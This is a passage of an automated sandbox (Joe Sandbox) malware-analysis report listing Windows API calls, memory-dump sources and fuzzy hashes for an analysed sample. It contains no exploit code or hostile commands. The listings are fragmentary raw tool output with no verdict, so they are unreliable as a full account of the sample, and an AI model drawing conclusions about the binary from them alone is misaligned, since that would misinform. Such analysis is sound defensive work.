                                                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,006F668B,?,?,006F62FA,?,00000001,?,?,00000000), ref: 006F666E
                                                                                                                                                                                                                                                                              Strings
Memory Dump Source
• Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
• Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                              • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                                                                                                                                                                              • API String ID: 145871493-3689287502
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00735657,?,?,006F62FA,?,00000001,?,?,00000000), ref: 006F6610
                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 006F6622
                                                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,00735657,?,?,006F62FA,?,00000001,?,?,00000000), ref: 006F6635
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                              • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                                                                                                                                                                              • API String ID: 145871493-1355242751
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 007635C4
                                                                                                                                                                                                                                                                              • DeleteFileW.KERNEL32(?), ref: 00763646
                                                                                                                                                                                                                                                                              • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0076365C
                                                                                                                                                                                                                                                                              • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0076366D
                                                                                                                                                                                                                                                                              • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0076367F
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: File$Delete$Copy
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 3226157194-0
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 0077AE87
                                                                                                                                                                                                                                                                              • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0077AE95
                                                                                                                                                                                                                                                                              • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0077AEC8
                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 0077B09D
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 3488606520-0
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 006FB329: _wcslen.LIBCMT ref: 006FB333
                                                                                                                                                                                                                                                                                • Part of subcall function 0077D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0077C10E,?,?), ref: 0077D415
                                                                                                                                                                                                                                                                                • Part of subcall function 0077D3F8: _wcslen.LIBCMT ref: 0077D451
                                                                                                                                                                                                                                                                                • Part of subcall function 0077D3F8: _wcslen.LIBCMT ref: 0077D4C8
                                                                                                                                                                                                                                                                                • Part of subcall function 0077D3F8: _wcslen.LIBCMT ref: 0077D4FE
                                                                                                                                                                                                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0077C505
                                                                                                                                                                                                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0077C560
                                                                                                                                                                                                                                                                              • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0077C5C3
                                                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?), ref: 0077C606
                                                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 0077C613
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 826366716-0
                                                                                                                                                                                                                                                                              • Opcode ID: b336bb27a6c2adc00133edf37995881b571ea02e7bd188e6dfee3011a34c5f5d
                                                                                                                                                                                                                                                                              • Instruction ID: 55e5eff293c44a28508334eb7edda46f17599a7731c10247721600cb2f85c49d
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b336bb27a6c2adc00133edf37995881b571ea02e7bd188e6dfee3011a34c5f5d
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B161B271108245AFDB15DF14C490E2ABBE5FF88348F64C59CF0998B292DB35ED45CB92
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 0075E6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0075D7CD,?), ref: 0075E714
                                                                                                                                                                                                                                                                                • Part of subcall function 0075E6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0075D7CD,?), ref: 0075E72D
                                                                                                                                                                                                                                                                                • Part of subcall function 0075EAB0: GetFileAttributesW.KERNEL32(?,0075D840), ref: 0075EAB1
                                                                                                                                                                                                                                                                              • lstrcmpiW.KERNEL32(?,?), ref: 0075ED8A
                                                                                                                                                                                                                                                                              • MoveFileW.KERNEL32(?,?), ref: 0075EDC3
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 0075EF02
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 0075EF1A
                                                                                                                                                                                                                                                                              • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 0075EF67
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 3183298772-0
                                                                                                                                                                                                                                                                              • Opcode ID: 21e156a3248c93a9a0098a61cd1eb693a7eca9b96b5118f253008663b7abf858
                                                                                                                                                                                                                                                                              • Instruction ID: 87e5b10396df05eb0a2b637b20ec367094cb4948c1999be808db97b1ecc53589
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 21e156a3248c93a9a0098a61cd1eb693a7eca9b96b5118f253008663b7abf858
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AA5185B21083849BC768EB94CC959DBB3ECEF84351F00492EF685D3191EF79A68C8756
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 00759534
                                                                                                                                                                                                                                                                              • VariantClear.OLEAUT32 ref: 007595A5
                                                                                                                                                                                                                                                                              • VariantClear.OLEAUT32 ref: 00759604
                                                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 00759677
                                                                                                                                                                                                                                                                              • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 007596A2
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Variant$Clear$ChangeInitType
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 4136290138-0
                                                                                                                                                                                                                                                                              • Opcode ID: 392f44f77dfb1578de5aa2dcc1f60ac94148bf84398475f48cde8007afbdfa9d
                                                                                                                                                                                                                                                                              • Instruction ID: 6e407f82ba17c52d67aa3a51bf1f0fdc420b38e9789f50742b56c1311341fec5
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 392f44f77dfb1578de5aa2dcc1f60ac94148bf84398475f48cde8007afbdfa9d
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 285146B5A00219EFCB14CF68C884EAAB7F9FF88310B158559EE09DB350E774E915CB90
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 007695F3
                                                                                                                                                                                                                                                                              • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 0076961F
                                                                                                                                                                                                                                                                              • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00769677
                                                                                                                                                                                                                                                                              • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0076969C
                                                                                                                                                                                                                                                                              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 007696A4
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: PrivateProfile$SectionWrite$String
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • LoadLibraryW.KERNEL32(?,00000000,?), ref: 0077999D
                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00779A2D
                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00779A49
                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00779A8F
                                                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 00779AAF
                                                                                                                                                                                                                                                                                • Part of subcall function 0070F9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00761A02,?,7644E610), ref: 0070F9F1
                                                                                                                                                                                                                                                                                • Part of subcall function 0070F9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00750354,00000000,00000000,?,?,00761A02,?,7644E610,?,00750354), ref: 0070FA18
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
• Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • SetWindowLongW.USER32(00000002,000000F0,?), ref: 0078766B
                                                                                                                                                                                                                                                                              • SetWindowLongW.USER32(?,000000EC,?), ref: 00787682
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 007876AB
                                                                                                                                                                                                                                                                              • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,0076B5BE,00000000,00000000), ref: 007876D0
                                                                                                                                                                                                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 007876FF
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Window$Long$MessageSendShow
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: _free
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00752262
                                                                                                                                                                                                                                                                              • PostMessageW.USER32(00000001,00000201,00000001), ref: 0075230E
                                                                                                                                                                                                                                                                              • Sleep.KERNEL32(00000000,?,?,?), ref: 00752316
                                                                                                                                                                                                                                                                              • PostMessageW.USER32(00000001,00000202,00000000), ref: 00752327
                                                                                                                                                                                                                                                                              • Sleep.KERNEL32(00000000,?,?,?,?), ref: 0075232F
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: MessagePostSleep$RectWindow
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,0076CC63,00000000), ref: 0076D97D
                                                                                                                                                                                                                                                                              • InternetReadFile.WININET(?,00000000,?,?), ref: 0076D9B4
                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00000000,?,?,?,0076CC63,00000000), ref: 0076D9F9
                                                                                                                                                                                                                                                                              • SetEvent.KERNEL32(?,?,00000000,?,?,?,0076CC63,00000000), ref: 0076DA0D
                                                                                                                                                                                                                                                                              • SetEvent.KERNEL32(?,?,00000000,?,?,?,0076CC63,00000000), ref: 0076DA37
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 3191363074-0
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00001053,000000FF,?), ref: 007861E4
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00001074,?,00000001), ref: 0078623C
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 0078624E
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00786259
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 007862B5
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: MessageSend$_wcslen
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 763830540-0
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • IsWindow.USER32(00000000), ref: 007713AE
                                                                                                                                                                                                                                                                              • GetForegroundWindow.USER32 ref: 007713C5
                                                                                                                                                                                                                                                                              • GetDC.USER32(00000000), ref: 00771401
                                                                                                                                                                                                                                                                              • GetPixel.GDI32(00000000,?,00000003), ref: 0077140D
                                                                                                                                                                                                                                                                              • ReleaseDC.USER32(00000000,00000003), ref: 00771445
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Window$ForegroundPixelRelease
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 4156661090-0
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetEnvironmentStringsW.KERNEL32 ref: 0072D146
                                                                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0072D169
                                                                                                                                                                                                                                                                                • Part of subcall function 00723B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00716A79,?,0000015D,?,?,?,?,007185B0,000000FF,00000000,?,?), ref: 00723BC5
                                                                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0072D18F
                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0072D1A2
                                                                                                                                                                                                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0072D1B1
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 336800556-0
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(0000000A,?,?,0071F64E,0071545F,0000000A,?,00000000,00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00723170
                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 007231A5
                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 007231CC
                                                                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 007231D9
                                                                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 007231E2
Memory Dump Source
• Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
• Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: ErrorLast$_free
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00750831,80070057,?,?,?,00750C4E), ref: 0075091B
                                                                                                                                                                                                                                                                              • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00750831,80070057,?,?), ref: 00750936
                                                                                                                                                                                                                                                                              • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00750831,80070057,?,?), ref: 00750944
                                                                                                                                                                                                                                                                              • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00750831,80070057,?), ref: 00750954
                                                                                                                                                                                                                                                                              • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00750831,80070057,?,?), ref: 00750960
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • QueryPerformanceCounter.KERNEL32(?), ref: 0075F2AE
                                                                                                                                                                                                                                                                              • QueryPerformanceFrequency.KERNEL32(?), ref: 0075F2BC
                                                                                                                                                                                                                                                                              • Sleep.KERNEL32(00000000), ref: 0075F2C4
                                                                                                                                                                                                                                                                              • QueryPerformanceCounter.KERNEL32(?), ref: 0075F2CE
                                                                                                                                                                                                                                                                              • Sleep.KERNEL32 ref: 0075F30A
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00751A60
                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00000000,00000000,?,?,007514E7,?,?,?), ref: 00751A6C
                                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,007514E7,?,?,?), ref: 00751A7B
                                                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,007514E7,?,?,?), ref: 00751A82
                                                                                                                                                                                                                                                                              • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00751A99
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00751976
                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00751982
                                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00751991
                                                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00751998
                                                                                                                                                                                                                                                                              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 007519AE
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              APIs
